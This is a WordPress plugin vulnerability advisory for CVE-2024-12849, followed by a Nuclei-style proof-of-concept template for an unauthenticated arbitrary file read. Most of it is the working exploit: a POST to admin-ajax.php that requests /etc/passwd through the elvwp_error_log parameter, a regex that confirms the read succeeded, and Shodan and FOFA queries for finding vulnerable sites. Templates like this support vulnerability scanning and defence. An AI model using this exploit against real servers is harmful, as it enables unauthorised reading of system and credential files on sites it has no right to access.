The Error Log Viewer By WP Guru plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1.3 via the wp_ajax_nopriv_elvwp_log_download AJAX action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.
PoC代码[已公开]
id: CVE-2024-12849
info:
name: Error Log Viewer By WP Guru <= 1.0.1.3 - Missing Authorization to Arbitrary File Read
author: s4e-io
severity: high
description: |
The Error Log Viewer By WP Guru plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.0.1.3 via the wp_ajax_nopriv_elvwp_log_download AJAX action. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.
reference:
- https://github.com/RandomRobbieBF/CVE-2024-12849
- https://www.wordfence.com/threat-intel/vulnerabilities/id/57888e36-3a61-4452-b4ea-9db9e422dc2d?source=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-12849
- https://github.com/advisories/GHSA-899p-f2mf-g895
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-12849
cwe-id: CWE-22
epss-score: 0.92386
epss-percentile: 0.99719
metadata:
verified: true
max-request: 2
vendor: wp-guru
product: error-log-viewer-wp
framework: wordpress
shodan-query: http.html:"wp-content/plugins/error-log-viewer-wp"
fofa-query: body="wp-content/plugins/error-log-viewer-wp"
tags: cve,cve2024,wordpress,wp,wp-plugin,error-log-viewer-wp,lfi
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/error-log-viewer-wp")'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- 'contains(content_type, "application/octet-stream")'
- "status_code == 200"
condition: and
# digest: 490a00463044022053d3548894a8ae68f3e3597ecac5ad3369311f718bfb518e58198bae983f224a02205a7ece5a5cb1f4a931ae1239217a3920b7d8dd2d639565393796463f4e2bd5ca:922c64590222798bb761d5b6d8e72950